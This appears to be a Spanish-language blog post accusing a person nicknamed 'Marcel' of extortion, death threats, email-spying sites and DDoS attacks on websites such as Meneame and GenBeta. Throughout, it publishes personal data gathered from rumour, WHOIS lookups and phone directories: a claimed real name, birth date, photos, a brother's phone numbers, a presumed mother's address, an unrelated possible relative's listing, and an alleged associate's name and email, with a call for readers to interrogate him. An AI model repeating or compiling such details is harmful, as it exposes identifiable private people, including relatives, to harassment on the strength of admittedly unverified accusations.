personas las cuales hemos visto denuncias en blogs mucho mas inocentes aun. Este
sujeto lo que hace es utilizar ingeniería inversa y social contactándose con
gente de altos conocimientos de seguridad y contraseguridad como Ribera Emilio,
hasta lograr convencerlos por cierta suma de dinero o simplemente trata de
ponerlos en contra de una empresa para luego ser afectada.


Sus actuales Webs:


www.quienteadmite.ms
Recientemente comprado

www.quienteadmite.info

www.quienteadmite.com

www.genialmsn.com <-- Antes era una web
para crear correos con distintos dominios como  cualquiercosa@
serviciodeinteligencia.com ..

www.revisatumsn.net 

www.serviciodeinteligencia.com
Lo puso en Sedo para que nadie diga nada!

www.atevip.net  <-- Retiramos esta como web complice por falta de
pruebas.


Otras webs de marcel que ya dejo en su pasado.


www.encuentrosweb.com
(2006)

www.fotologging.com
(2006)

www.espiacorreos.com
(2005) Una de las mas antiguas 

www.secretosdelmsn.com
(2006)


 



Aclaramos que tiene muchos otros sitios que no vamos a dar a conocer, porque no
están relacionados a este problema y además hay gente inocente en sociedad que
no deseamos involucrar y mucho menos comprometer.



Sus E-Mails:


webmaster@quienteadmite.com

info@encuentrosweb.com

peritoforense@serviciodeinteligencia.com

marcel@revisatumsn.com

staff@quienteadmite.com



Webs afectadas:


www.elserver.com 

www.genbeta.com


www.berggi.com

www.powweb.com


www.dattatec.com 

www.ricardogalli.com

www.error500.net

www.granpecado.com 

www.caminando.com.es

www.descubremsn.com

www.meneame.net

www.listamsn.net

www.admitidomsn.com

www.weblogssl.com

www.medesadmite.com


...

"Entre otras"


La lista sigue creciendo a medida que progresa la investigación ...




Algunos datos clave para develar la identidad de este delincuente apodado
Marcel


Datos del hermano de Marcel:


Nombre: Martín

Apellido: Buils

Teléfono: (011) 1560952457

Web: www.bsasnight.com

Actividad: Webmaster y organiza encuentros en discotecas.


Mas datos sobre el hermano!


Martin Buils - RR.PP & Org. de Eventos

Cel.: 15-6095-2457 // Nextel ID: 567*958

E-mail/MSN: martin@bsasnight.com

+ info http://www.bsasnight.com








Una pequeña imagen del hermano: 










Haciendo un whois a bsasnight.com,


Se sospecha que son los datos de su madre

 










(toda esta información es enviada por gente que conoce muy de cerca sus
actividades de Marcel y muchos tienen miedo ya que este tipo anda amenazándolos
constantemente via correos o telefónicamente )


Inclusive amenaza de muerte a los Crackers que hacen  DDoS para que
trabajen tumbando a su competencia o para que sigan de su lado. Si eres uno de
ellos denúncialo no protejas a un criminal de este calibre. 


 


Según se nos informo gente que conocía el caso Granpecado.com una de
las paginas mas  atacadas por ese tal Marcel nos revelaron una pista fuerte
verdadero nombre de Marcel 
es Agustín.





Osease que su nombre es asi:


Agustin Buils  


El es propietario de la pagina
Quienteadmite.com
dado también nos dieron referencia que vive en Buenos Aires 3
personas distintas.


y buscando en las paginas blancas de Buenos Aires a alguien con el apellido
Buils solo hallamos una coincidencia.


que seria:




BUILS ROBERTO J (02477) 42-2482


Para llamar desde fuera de argentina se marca asi 54-2477-42-2482 

San Nicolás 53 - Pergamino - BUENOS AIRE


El unico señor con el apellido Buils, puede ser un tio o el padre de Agustin
aun no lo sabemos pero dentro de poco sera develada toda la info respectiva.


 


 


Datos de gente que dice conocer al hermano y no hemos logrado obtener datos
concretos aun por medio de estas personas:




1º:


web: www.cascompany.com



E-Mails: info@cascompany.com, sales@cascompany.com, support@cascompany.com


2º:



E-Mail: webservice@fibertel.com.ar

 


 


 Hace ya buen tiempo este personaje tenia otras webs como ya dije antes
de exploits y fotos para usuarios


fotologging.com



la cual la tenia contratado con la empresa XEONEX y ellos podrían darnos mas
detalles de Agustin Buils (alias Marcel)




Ahora le hacemos un whois http://whois.domaintools.com/fotologging.com


Datos de la empresa Xeonex


 Administrative Contact:

      Adams, Monty Christhian  mail:
mcadams@xeonex.com.mx

      XEONEX NETWORKS

      GUADALAJARA 28 INT 402-A

      LOMAS DE COSTA AZUL

      ACAPULCO, Guerrero 39830

      Mexico

      527444846261      Fax -- 52.7444846261


Adams conoce muy bien los ataques de Emilio Ribera hace tiempo tenia que
defender sus servidores de muchos ataques ddos por parte de Emilio


wow como se consigue información preguntando un poco eh jeje sigamos


Con ellos contrataba servidores asi que se podria verificar contactándose
con ellos también.


Por aqui investigando una de sus viejas webs de Marcel hallamos:


secretosdelmsn.com


Web dedicada al urto y espionaje de correos electrónicos actividad
totalmente ilegal.


Que mas nos tendra Agustin escondido la investigación continua.... si sabes
algo sobre el puedes agregarlo como comentario.


 


 


Marcel utiliza el servicio de www.fibertel.com.ar
para conectarse a Internet.

 


Aquí les presentamos una
fotos de Agustin Buils ya esta confirmado al 100% que es el mismisimo Marcel que
extorciona a medio mundo!


Amenaza de muerte y ataca servidores, datacenters y
portales.


 



Los datos impresos en la foto no podemos asegurar que sean reales ya que nos
llego asi de otra fuente

pero la foto si es de Agustin.



Esperamos que este reporte les sea de gran ayuda.



Ahora que tenemos su nombre de Marcel se me ocurrió buscar en google aver si
teníamos suerte y oh sorpresa encontramos su foto de nuevo adivinen donde, en SONICO.COM


wow tremendo despiste de nuestro querido Marcel seguramente ni bien lea esto
tratara de borrar su perfil pero aquí os tengo una linda fotito de su perfil en
Sonico:


http://www.sonico.com/profile.php?u=1000264


Copia mirror en la cache de google! ( por siacaso Marcel nos borra el perfil
)

http://64.233.169.104/search?q=cache:bzJJKl9xoeUJ:ww...
(actualización la cache ya guardo la version del perfil en modo
privado:-(  ) 



Con este hallazgo confirmamos que Marcel es efectivamente el que sale en la
foto y su nombre es correcto!


Donde apreciamos algunos datos como su edad 22 años fecha de nacimiento
27/11/1985 


Nacio en Capital Federal (Argentina)


 


Datos que coninciden con el whois echo al dominio de su hermano donde salen
los sospechosos datos de la madre!

Pasteur 277 capital Federal Ba 1028 (argentina)
<-- asi figura en el whois!

Presumimos que es la dirección de la señora madre de este ser y el lugar de
nacimiento.


Otros datos obtenidos de su viejo perfil es la foto de su mascota jeje bien ah Agustín hasta el minino te
pille!


Aunque no tenga nada que ver con la investigación seguramente a Agustín le
gustara ver su viejo minino asiéndose famoso.



Se llama Koller! 


ACTUALIZACION: 


El tal Agustín ya vio nuestro blog y vio que su
foto salía en el perfil de sonico.com a lo cual inteligentemente decidió pasar
de acceso a todo publico a acceso privado, para que nadie mas vea sus fotos
amenos que seas un amigo aceptado por el.


ANTES DE LEER NUESTRO
INFORME





DESPUER DE LEER NUESTRO
INFORME



Eso una ves mas confirma sus intentos por ocultar su
identidad lo cual nos reafirma que vamos por buen camino. 


Pobre tontuelo yo estaba seguro al 90% que Agustín
buil era su nombre pero ahora gracias a eso, estoy seguro un 100% 


Bien ya tenemos identificado el nombre del criminal
y una foto ahora nos falta completar la dirección actual para ubicarlo y
seguramente no tardare mucho en hacerlo, ha habido mucha gente que esta
cooperando en anónimo, gente cercana a Marcel, que esta cansada de sus abusos y
extorsiones.


Una descripción rápida según algunos webmasters que conocen su modus
operandi de marcel (Agustin Buils 22).




Le gusta crearce muchos correos con nombres como delitosinformaticos,
anticrimenes, etc. Simulando ser una autoridad legal para amenazar a otros
webmasters.




Le gusta suplantar identidades, un caso típico, dice ser dueño de estaweb.com
y molesta a otraweb.com para que estaweb web caiga o tenga problemas.



Táctica de engaño común de Agustin te dice vamos a hacer un negocio que dara
mucho dinero te mando un pago de muestra y te pide tus datos personales para
hacerte el giro por Wester Union, menuda estafa solo quiere tus datos para poder
amenazarte con total soltura.


Es pedante, presumido, muy mentiroso.




Hay mas cualidades que nos van reportando en modo confidencial. Agradecemos
nuevamente a todos por su cooperación. 


 


 


Bueno la investigación continua...


 


 


Para los que no entienden que hace este señor aqui un grafico explicativo de
las actividades criminales de Agustin Buils



 


Algunos sospechosos nuevos que vamos encontrando con la investigación:


Un tal Alvaro autodenominado Nevadak fue socio de Agustin hace un tiempo y me
llego rumores que también sabe hacer ataques de denegación de servicio, por si
las dudas pondremos sus datos aqui!


nombre completo: alvaro fernandez buron 

correo: nevadak@gmail.com (Este personaje
puede colaborar con la captura de Agustin vasta con agregarle y preguntarle
cosas sobre Marcel,  ya si no quiere cooperar, significara que esta
embarrado en ese turbio grupo de criminales ) Ya ustedes sacaran sus propias conclusiones
interrogando al sospechoso y revisando las pruebas aquí puestas.


 


 


 


Para Marcel:



Todos los criminales terminan pagando sus crímenes, recuérdalo.


Todo el daño causado a Meneame, GenBeta y demas sitios seran sansionados.



 


 


 


 


Importante:  No
vamos a dejar ninguna dirección de contacto, no tenemos ningún animo de lucro,
por lo tanto no deseamos ninguna especulación hacia el editor de este
contenido.


Que tengan un buen día!.


 


Artículos relacionados:



Bueno hay muchos artículos sobre las actividades ilícitas de
este  señor  autodenominado Marcel de Argentina!.


Vasta buscar en google:


http://www.google.com.pe/search?q=quienteadmite+ddos&hl=es&start=0&sa=N


 


 


 


Notas extras:


Enrique
Dans
nos comenta: “El análisis de los ataques ha permitido ya obtener
bastante información que no puedo facilitar con el fin de no dificultar las
investigaciones al respecto, pero es un asunto relacionado con los más bajos
fondos y la parte más negra y asquerosa de la web.”


Honestamente espero que las cosas se estabilicen pronto y que puedan capturar
a estos delincuentes. Si tú deseas colaborar a la causa, envía un mail a tus
amigos con el artículo que provocó todo esto, para que cada vez más personas
se enteren del fraude que hacen los spammers con esto del MSN.


 


 


 


POSTDATA: A todos los involucrados en
especial a los señores que se dedican a hacer ataques ddos les conviene
denunciar a Marcel (Agustin Buils) por que sino serán arrastrados con todos sus
cargos gracias y que tengan buen dia.


 


 


Fuente principal: Quienteadmite